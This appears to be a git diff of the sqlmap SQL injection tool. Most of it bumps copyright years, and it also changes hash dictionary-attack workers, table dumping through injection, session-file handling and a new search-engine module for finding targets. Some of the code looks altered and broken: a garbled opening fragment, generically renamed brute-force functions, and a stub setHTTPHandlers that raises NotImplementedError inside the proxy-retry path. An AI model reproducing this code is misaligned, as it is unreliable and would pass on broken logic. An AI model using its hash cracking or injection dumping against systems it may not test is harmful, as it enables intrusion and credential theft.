__functions__[hash_regex].func_name @@ -812,12 +842,12 @@ def dictionaryAttack(attack_dict): count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): - p = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist)) - processes.append(p) + process = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist, conf.api)) + processes.append(process) - for p in processes: - p.daemon = True - p.start() + for process in processes: + process.daemon = True + process.start() while count.value > 0: time.sleep(0.5) @@ -828,7 +858,7 @@ def dictionaryAttack(attack_dict): singleTimeWarnMessage(warnMsg) retVal = Queue() - _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist) + _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist, conf.api) except KeyboardInterrupt: print @@ -896,12 +926,12 @@ def dictionaryAttack(attack_dict): count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): - p = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist)) - processes.append(p) + process = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist, conf.api)) + processes.append(process) - for p in processes: - p.daemon = True - p.start() + for process in processes: + process.daemon = True + process.start() while count.value > 0: time.sleep(0.5) @@ -920,7 +950,7 @@ def dictionaryAttack(attack_dict): found_ = Value() found_.value = False - _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist) + _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist, conf.api) found = found_.value @@ -955,9 +985,8 @@ def dictionaryAttack(attack_dict): results.extend(resumes) - if len(hash_regexes) == 0: - warnMsg = "unknown hash format. " - warnMsg += "Please report by e-mail to 'dev@sqlmap.org'" + if foundHash and len(hash_regexes) == 0: + warnMsg = "unknown hash format" logger.warn(warnMsg) if len(results) == 0: diff --git a/lib/utils/hashdb.py b/lib/utils/hashdb.py index 3f20432d9..f86d779d9 100644 --- a/lib/utils/hashdb.py +++ b/lib/utils/hashdb.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -11,14 +11,17 @@ import sqlite3 import threading import time +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import serializeObject +from lib.core.common import singleTimeWarnMessage from lib.core.common import unserializeObject from lib.core.data import logger -from lib.core.exception import SqlmapDataException +from lib.core.exception import SqlmapConnectionException from lib.core.settings import HASHDB_END_TRANSACTION_RETRIES from lib.core.settings import HASHDB_FLUSH_RETRIES from lib.core.settings import HASHDB_FLUSH_THRESHOLD +from lib.core.settings import HASHDB_RETRIEVE_RETRIES from lib.core.settings import UNICODE_ENCODING from lib.core.threads import getCurrentThreadData from lib.core.threads import getCurrentThreadName @@ -37,10 +40,11 @@ class HashDB(object): connection = sqlite3.connect(self.filepath, timeout=3, isolation_level=None) threadData.hashDBCursor = connection.cursor() threadData.hashDBCursor.execute("CREATE TABLE IF NOT EXISTS storage (id INTEGER PRIMARY KEY, value TEXT)") + connection.commit() except Exception, ex: errMsg = "error occurred while opening a session " - errMsg += "file '%s' ('%s')" % (self.filepath, ex) - raise SqlmapDataException(errMsg) + errMsg += "file '%s' ('%s')" % (self.filepath, getSafeExString(ex)) + raise SqlmapConnectionException(errMsg) return threadData.hashDBCursor @@ -63,29 +67,47 @@ class HashDB(object): @staticmethod def hashKey(key): key = key.encode(UNICODE_ENCODING) if isinstance(key, unicode) else repr(key) - retVal = int(hashlib.md5(key).hexdigest()[:12], 16) + retVal = int(hashlib.md5(key).hexdigest(), 16) & 0x7fffffffffffffff # Reference: http://stackoverflow.com/a/4448400 return retVal def retrieve(self, key, unserialize=False): retVal = None + if key and (self._write_cache or os.path.isfile(self.filepath)): hash_ = HashDB.hashKey(key) retVal = self._write_cache.get(hash_) if not retVal: - while True: + for _ in xrange(HASHDB_RETRIEVE_RETRIES): try: for row in self.cursor.execute("SELECT value FROM storage WHERE id=?", (hash_,)): retVal = row[0] except sqlite3.OperationalError, ex: - if not "locked" in ex.message: + if any(_ in getSafeExString(ex) for _ in ("locked", "no such table")): + warnMsg = "problem occurred while accessing session file '%s' ('%s')" % (self.filepath, getSafeExString(ex)) + singleTimeWarnMessage(warnMsg) + elif "Could not decode" in getSafeExString(ex): + break + else: raise except sqlite3.DatabaseError, ex: - errMsg = "error occurred while accessing session file '%s' ('%s'). " % (self.filepath, ex) + errMsg = "error occurred while accessing session file '%s' ('%s'). " % (self.filepath, getSafeExString(ex)) errMsg += "If the problem persists please rerun with `--flush-session`" - raise SqlmapDataException, errMsg + raise SqlmapConnectionException, errMsg else: break - return retVal if not unserialize else unserializeObject(retVal) + + time.sleep(1) + + if retVal and unserialize: + try: + retVal = unserializeObject(retVal) + except: + retVal = None + warnMsg = "error occurred while unserializing value for session key '%s'. " % key + warnMsg += "If the problem persists please rerun with `--flush-session`" + logger.warn(warnMsg) + + return retVal def write(self, key, value, serialize=False): if key: @@ -127,7 +149,7 @@ class HashDB(object): if retries == 0: warnMsg = "there has been a problem while writing to " - warnMsg += "the session file ('%s')" % ex.message + warnMsg += "the session file ('%s')" % getSafeExString(ex) logger.warn(warnMsg) if retries >= HASHDB_FLUSH_RETRIES: diff --git a/lib/utils/htmlentities.py b/lib/utils/htmlentities.py index 951c5c4a2..bc9d73c31 100644 --- a/lib/utils/htmlentities.py +++ b/lib/utils/htmlentities.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/utils/pivotdumptable.py b/lib/utils/pivotdumptable.py index 392c3aaf9..99bf4b4a6 100644 --- a/lib/utils/pivotdumptable.py +++ b/lib/utils/pivotdumptable.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -11,14 +11,17 @@ from extra.safe2bin.safe2bin import safechardecode from lib.core.agent import agent from lib.core.bigarray import BigArray from lib.core.common import Backend +from lib.core.common import getUnicode from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue from lib.core.common import singleTimeWarnMessage from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf +from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries +from lib.core.dicts import DUMP_REPLACEMENTS from lib.core.enums import CHARSET_TYPE from lib.core.enums import EXPECTED from lib.core.exception import SqlmapConnectionException @@ -38,7 +41,7 @@ def pivotDumpTable(table, colList, count=None, blind=True): if count is None: query = dumpNode.count % table - query = whereQuery(query) + query = agent.whereQuery(query) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if blind else inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT) if isinstance(count, basestring) and count.isdigit(): @@ -64,15 +67,19 @@ def pivotDumpTable(table, colList, count=None, blind=True): colList = filter(None, sorted(colList, key=lambda x: len(x) if x else MAX_INT)) if conf.pivotColumn: - if any(re.search(r"(.+\.)?%s" % re.escape(conf.pivotColumn), _, re.I) for _ in colList): - infoMsg = "using column '%s' as a pivot " % conf.pivotColumn - infoMsg += "for retrieving row data" - logger.info(infoMsg) + for _ in colList: + if re.search(r"(.+\.)?%s" % re.escape(conf.pivotColumn), _, re.I): + infoMsg = "using column '%s' as a pivot " % conf.pivotColumn + infoMsg += "for retrieving row data" + logger.info(infoMsg) - validPivotValue = True - colList.remove(conf.pivotColumn) - colList.insert(0, conf.pivotColumn) - else: + colList.remove(_) + colList.insert(0, _) + + validPivotValue = True + break + + if not validPivotValue: warnMsg = "column '%s' not " % conf.pivotColumn warnMsg += "found in table '%s'" % table logger.warn(warnMsg) @@ -84,7 +91,7 @@ def pivotDumpTable(table, colList, count=None, blind=True): logger.info(infoMsg) query = dumpNode.count2 % (column, table) - query = whereQuery(query) + query = agent.whereQuery(query) value = inject.getValue(query, blind=blind, union=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if isNumPosStrValue(value): @@ -112,29 +119,32 @@ def pivotDumpTable(table, colList, count=None, blind=True): pivotValue = " " breakRetrieval = False + def _(column, pivotValue): + if column == colList[0]: + query = dumpNode.query.replace("'%s'", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, column), unescaper.escape(pivotValue, False)) + else: + query = dumpNode.query2.replace("'%s'", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, colList[0]), unescaper.escape(pivotValue, False)) + + query = agent.whereQuery(query) + return unArrayizeValue(inject.getValue(query, blind=blind, time=blind, union=not blind, error=not blind)) + try: for i in xrange(count): if breakRetrieval: break for column in colList: - def _(pivotValue): - if column == colList[0]: - query = dumpNode.query.replace("'%s'", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, column), unescaper.escape(pivotValue, False)) - else: - query = dumpNode.query2.replace("'%s'", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, colList[0]), unescaper.escape(pivotValue, False)) - - query = whereQuery(query) - - return unArrayizeValue(inject.getValue(query, blind=blind, time=blind, union=not blind, error=not blind)) - - value = _(pivotValue) + value = _(column, pivotValue) if column == colList[0]: if isNoneValue(value): - for pivotValue in filter(None, (" " if pivotValue == " " else None, "%s%s" % (pivotValue[0], unichr(ord(pivotValue[1]) + 1)) if len(pivotValue) > 1 else None, unichr(ord(pivotValue[0]) + 1))): - value = _(pivotValue) - if not isNoneValue(value): - break + try: + for pivotValue in filter(None, (" " if pivotValue == " " else None, "%s%s" % (pivotValue[0], unichr(ord(pivotValue[1]) + 1)) if len(pivotValue) > 1 else None, unichr(ord(pivotValue[0]) + 1))): + value = _(column, pivotValue) + if not isNoneValue(value): + break + except ValueError: + pass + if isNoneValue(value): breakRetrieval = True break @@ -152,10 +162,12 @@ def pivotDumpTable(table, colList, count=None, blind=True): value = "" if isNoneValue(value) else unArrayizeValue(value) - lengths[column] = max(lengths[column], len(value) if value else 0) + lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)))) entries[column].append(value) except KeyboardInterrupt: + kb.dumpKeyboardInterrupt = True + warnMsg = "user aborted during enumeration. sqlmap " warnMsg += "will display partial output" logger.warn(warnMsg) @@ -167,18 +179,3 @@ def pivotDumpTable(table, colList, count=None, blind=True): logger.critical(errMsg) return entries, lengths - -def whereQuery(query): - if conf.dumpWhere and query: - prefix, suffix = query.split(" ORDER BY ") if " ORDER BY " in query else (query, "") - - if "%s)" % conf.tbl.upper() in prefix.upper(): - prefix = re.sub(r"(?i)%s\)" % re.escape(conf.tbl), "%s WHERE %s)" % (conf.tbl, conf.dumpWhere), prefix) - elif re.search(r"(?i)\bWHERE\b", prefix): - prefix += " AND %s" % conf.dumpWhere - else: - prefix += " WHERE %s" % conf.dumpWhere - - query = "%s ORDER BY %s" % (prefix, suffix) if suffix else prefix - - return query diff --git a/lib/utils/progress.py b/lib/utils/progress.py index 98397d81e..eb45d2388 100644 --- a/lib/utils/progress.py +++ b/lib/utils/progress.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/utils/purge.py b/lib/utils/purge.py index 1447f8061..437e047ba 100644 --- a/lib/utils/purge.py +++ b/lib/utils/purge.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -11,6 +11,7 @@ import shutil import stat import string +from lib.core.common import getSafeExString from lib.core.data import logger def purge(directory): @@ -79,4 +80,4 @@ def purge(directory): try: shutil.rmtree(directory) except OSError, ex: - logger.error("problem occurred while removing directory '%s' ('%s')" % (directory, unicode(ex))) + logger.error("problem occurred while removing directory '%s' ('%s')" % (directory, getSafeExString(ex))) diff --git a/lib/utils/search.py b/lib/utils/search.py new file mode 100644 index 000000000..ee8fd76f9 --- /dev/null +++ b/lib/utils/search.py @@ -0,0 +1,192 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import httplib +import re +import socket +import urllib +import urllib2 + +from lib.core.common import getSafeExString +from lib.core.common import getUnicode +from lib.core.common import popValue +from lib.core.common import pushValue +from lib.core.common import readInput +from lib.core.common import urlencode +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import CUSTOM_LOGGING +from lib.core.enums import HTTP_HEADER +from lib.core.enums import REDIRECTION +from lib.core.exception import SqlmapBaseException +from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapUserQuitException +from lib.core.settings import DUMMY_SEARCH_USER_AGENT +from lib.core.settings import DUCKDUCKGO_REGEX +from lib.core.settings import DISCONNECT_SEARCH_REGEX +from lib.core.settings import GOOGLE_REGEX +from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE +from lib.core.settings import UNICODE_ENCODING +from lib.request.basic import decodePage +from thirdparty.socks import socks + + +def _search(dork): + """ + This method performs the effective search on Google providing + the google dork and the Google session cookie + """ + + if not dork: + return None + + headers = {} + + headers[HTTP_HEADER.USER_AGENT] = dict(conf.httpHeaders).get(HTTP_HEADER.USER_AGENT, DUMMY_SEARCH_USER_AGENT) + headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE + + try: + req = urllib2.Request("https://www.google.com/ncr", headers=headers) + conn = urllib2.urlopen(req) + except Exception, ex: + errMsg = "unable to connect to Google ('%s')" % getSafeExString(ex) + raise SqlmapConnectionException(errMsg) + + gpage = conf.googlePage if conf.googlePage > 1 else 1 + logger.info("using search result page #%d" % gpage) + + url = "https://www.google.com/search?" + url += "q=%s&" % urlencode(dork, convall=True) + url += "num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search" + url += "&start=%d" % ((gpage - 1) * 100) + + try: + req = urllib2.Request(url, headers=headers) + conn = urllib2.urlopen(req) + + requestMsg = "HTTP request:\nGET %s" % url + requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str + logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + + page = conn.read() + code = conn.code + status = conn.msg + responseHeaders = conn.info() + page = decodePage(page, responseHeaders.get("Content-Encoding"), responseHeaders.get("Content-Type")) + + responseMsg = "HTTP response (%s - %d):\n" % (status, code) + + if conf.verbose <= 4: + responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING) + elif conf.verbose > 4: + responseMsg += "%s\n%s\n" % (responseHeaders, page) + + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) + except urllib2.HTTPError, e: + try: + page = e.read() + except Exception, ex: + warnMsg = "problem occurred while trying to get " + warnMsg += "an error page information (%s)" % getSafeExString(ex) + logger.critical(warnMsg) + return None + except (urllib2.URLError, httplib.error, socket.error, socket.timeout, socks.ProxyError): + errMsg = "unable to connect to Google" + raise SqlmapConnectionException(errMsg) + + retVal = [urllib.unquote(match.group(1) or match.group(2)) for match in re.finditer(GOOGLE_REGEX, page, re.I)] + + if not retVal and "detected unusual traffic" in page: + warnMsg = "Google has detected 'unusual' traffic from " + warnMsg += "used IP address disabling further searches" + logger.warn(warnMsg) + + if not retVal: + message = "no usable links found. What do you want to do?" + message += "\n[1] (re)try with DuckDuckGo (default)" + message += "\n[2] (re)try with Disconnect Search" + message += "\n[3] quit" + choice = readInput(message, default='1') + + if choice == '3': + raise SqlmapUserQuitException + elif choice == '2': + url = "https://search.disconnect.me/searchTerms/search?" + url += "start=nav&option=Web" + url += "&query=%s" % urlencode(dork, convall=True) + url += "&ses=Google&location_option=US" + url += "&nextDDG=%s" % urlencode("/search?q=%s&setmkt=en-US&setplang=en-us&setlang=en-us&first=%d&FORM=PORE" % (urlencode(dork, convall=True), (gpage - 1) * 10), convall=True) + url += "&sa=N&showIcons=false&filterIcons=none&js_enabled=1" + regex = DISCONNECT_SEARCH_REGEX + else: + url = "https://duckduckgo.com/d.js?" + url += "q=%s&p=%d&s=100" % (urlencode(dork, convall=True), gpage) + regex = DUCKDUCKGO_REGEX + + try: + req = urllib2.Request(url, headers=headers) + conn = urllib2.urlopen(req) + + requestMsg = "HTTP request:\nGET %s" % url + requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str + logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + + page = conn.read() + code = conn.code + status = conn.msg + responseHeaders = conn.info() + page = decodePage(page, responseHeaders.get("Content-Encoding"), responseHeaders.get("Content-Type")) + + responseMsg = "HTTP response (%s - %d):\n" % (status, code) + + if conf.verbose <= 4: + responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING) + elif conf.verbose > 4: + responseMsg += "%s\n%s\n" % (responseHeaders, page) + + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) + except urllib2.HTTPError, e: + try: + page = e.read() + except socket.timeout: + warnMsg = "connection timed out while trying " + warnMsg += "to get error page information (%d)" % e.code + logger.critical(warnMsg) + return None + except: + errMsg = "unable to connect" + raise SqlmapConnectionException(errMsg) + + retVal = [urllib.unquote(match.group(1)) for match in re.finditer(regex, page, re.I | re.S)] + + return retVal + +def search(dork): + pushValue(kb.redirectChoice) + kb.redirectChoice = REDIRECTION.YES + + try: + return _search(dork) + except SqlmapBaseException, ex: + if conf.proxyList: + logger.critical(getSafeExString(ex)) + + warnMsg = "changing proxy" + logger.warn(warnMsg) + + conf.proxy = None + + setHTTPHandlers() + return search(dork) + else: + raise + finally: + kb.redirectChoice = popValue() + +def setHTTPHandlers(): # Cross-linked function + raise NotImplementedError diff --git a/lib/utils/sqlalchemy.py b/lib/utils/sqlalchemy.py index 1b654ef2f..f85ff17a9 100644 --- a/lib/utils/sqlalchemy.py +++ b/lib/utils/sqlalchemy.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -9,6 +9,7 @@ import imp import logging import os import sys +import traceback import warnings _sqlalchemy = None @@ -53,8 +54,17 @@ class SQLAlchemy(GenericConnector): if self.dialect: conf.direct = conf.direct.replace(conf.dbms, self.dialect, 1) - engine = _sqlalchemy.create_engine(conf.direct, connect_args={'check_same_thread':False} if self.dialect == "sqlite" else {}) + engine = _sqlalchemy.create_engine(conf.direct, connect_args={"check_same_thread": False} if self.dialect == "sqlite" else {}) self.connector = engine.connect() + except (TypeError, ValueError): + if "_get_server_version_info" in traceback.format_exc(): + try: + import pymssql + if int(pymssql.__version__[0]) < 2: + raise SqlmapConnectionException("SQLAlchemy connection issue (obsolete version of pymssql ('%s') is causing problems)" % pymssql.__version__) + except ImportError: + pass + raise except SqlmapFilePathException: raise except Exception, msg: diff --git a/lib/utils/timeout.py b/lib/utils/timeout.py index 950caa717..33b010605 100644 --- a/lib/utils/timeout.py +++ b/lib/utils/timeout.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -9,25 +9,29 @@ import threading from lib.core.data import logger from lib.core.enums import CUSTOM_LOGGING +from lib.core.enums import TIMEOUT_STATE def timeout(func, args=(), kwargs={}, duration=1, default=None): class InterruptableThread(threading.Thread): def __init__(self): threading.Thread.__init__(self) self.result = None + self.timeout_state = None def run(self): try: self.result = func(*args, **kwargs) + self.timeout_state = TIMEOUT_STATE.NORMAL except Exception, msg: logger.log(CUSTOM_LOGGING.TRAFFIC_IN, msg) self.result = default + self.timeout_state = TIMEOUT_STATE.EXCEPTION thread = InterruptableThread() thread.start() thread.join(duration) if thread.isAlive(): - return default + return default, TIMEOUT_STATE.TIMEOUT else: - return thread.result + return thread.result, thread.timeout_state diff --git a/lib/utils/versioncheck.py b/lib/utils/versioncheck.py index a1cd1175a..f47825729 100644 --- a/lib/utils/versioncheck.py +++ b/lib/utils/versioncheck.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -10,7 +10,7 @@ import sys PYVERSION = sys.version.split()[0] if PYVERSION >= "3" or PYVERSION < "2.6": - exit("[CRITICAL] incompatible Python version detected ('%s'). For successfully running sqlmap you'll have to use version 2.6 or 2.7 (visit 'http://www.python.org/download/')" % PYVERSION) + exit("[CRITICAL] incompatible Python version detected ('%s'). For successfully running sqlmap you'll have to use version 2.6.x or 2.7.x (visit 'http://www.python.org/download/')" % PYVERSION) extensions = ("gzip", "ssl", "sqlite3", "zlib") try: @@ -18,6 +18,6 @@ try: __import__(_) except ImportError: errMsg = "missing one or more core extensions (%s) " % (", ".join("'%s'" % _ for _ in extensions)) - errMsg += "most probably because current version of Python has been " + errMsg += "most likely because current version of Python has been " errMsg += "built without appropriate dev packages (e.g. 'libsqlite3-dev')" exit(errMsg) \ No newline at end of file diff --git a/lib/utils/xrange.py b/lib/utils/xrange.py index c5931b5d4..d525d05ba 100644 --- a/lib/utils/xrange.py +++ b/lib/utils/xrange.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -85,3 +85,9 @@ class xrange(object): def _index(self, i): return self.start + self.step * i + + def index(self, i): + if self.start <= i < self.stop: + return i - self.start + else: + raise ValueError("%d is not in list" % i) diff --git a/plugins/__init__.py b/plugins/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/plugins/__init__.py +++ b/plugins/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/__init__.py b/plugins/dbms/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/plugins/dbms/__init__.py +++ b/plugins/dbms/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/access/__init__.py b/plugins/dbms/access/__init__.py index bfb66e57e..53f8a7536 100644 --- a/plugins/dbms/access/__init__.py +++ b/plugins/dbms/access/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/access/connector.py b/plugins/dbms/access/connector.py index 03bcce91e..0ecb81623 100644 --- a/plugins/dbms/access/connector.py +++ b/plugins/dbms/access/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/access/enumeration.py b/plugins/dbms/access/enumeration.py index 1dc5bd991..dcf357a74 100644 --- a/plugins/dbms/access/enumeration.py +++ b/plugins/dbms/access/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/access/filesystem.py b/plugins/dbms/access/filesystem.py index ee471df2f..6d587b4a5 100644 --- a/plugins/dbms/access/filesystem.py +++ b/plugins/dbms/access/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py index 2cbe12835..a97ee4067 100644 --- a/plugins/dbms/access/fingerprint.py +++ b/plugins/dbms/access/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -146,7 +146,7 @@ class Fingerprint(GenericFingerprint): return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(ACCESS_ALIASES) or (conf.dbms or "").lower() in ACCESS_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(ACCESS_ALIASES): setDbms(DBMS.ACCESS) return True diff --git a/plugins/dbms/access/syntax.py b/plugins/dbms/access/syntax.py index b43500e15..6ee9ef791 100644 --- a/plugins/dbms/access/syntax.py +++ b/plugins/dbms/access/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/access/takeover.py b/plugins/dbms/access/takeover.py index f36dd0b7f..7d0729606 100644 --- a/plugins/dbms/access/takeover.py +++ b/plugins/dbms/access/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/db2/__init__.py b/plugins/dbms/db2/__init__.py index 0a5ea5718..723abbb37 100644 --- a/plugins/dbms/db2/__init__.py +++ b/plugins/dbms/db2/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/db2/connector.py b/plugins/dbms/db2/connector.py index feeb9b046..1f692e3a5 100644 --- a/plugins/dbms/db2/connector.py +++ b/plugins/dbms/db2/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/db2/enumeration.py b/plugins/dbms/db2/enumeration.py index ba4fdef9c..1e9777b13 100644 --- a/plugins/dbms/db2/enumeration.py +++ b/plugins/dbms/db2/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -18,4 +18,3 @@ class Enumeration(GenericEnumeration): logger.warn(warnMsg) return {} - diff --git a/plugins/dbms/db2/filesystem.py b/plugins/dbms/db2/filesystem.py index 616958820..b02afc7d3 100644 --- a/plugins/dbms/db2/filesystem.py +++ b/plugins/dbms/db2/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/db2/fingerprint.py b/plugins/dbms/db2/fingerprint.py index bc3f299ac..f8deb9a29 100644 --- a/plugins/dbms/db2/fingerprint.py +++ b/plugins/dbms/db2/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -81,7 +81,7 @@ class Fingerprint(GenericFingerprint): return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(DB2_ALIASES) or (conf.dbms or "").lower() in DB2_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(DB2_ALIASES): setDbms(DBMS.DB2) return True diff --git a/plugins/dbms/db2/syntax.py b/plugins/dbms/db2/syntax.py index 3a46c4d3b..00e8dc956 100644 --- a/plugins/dbms/db2/syntax.py +++ b/plugins/dbms/db2/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap 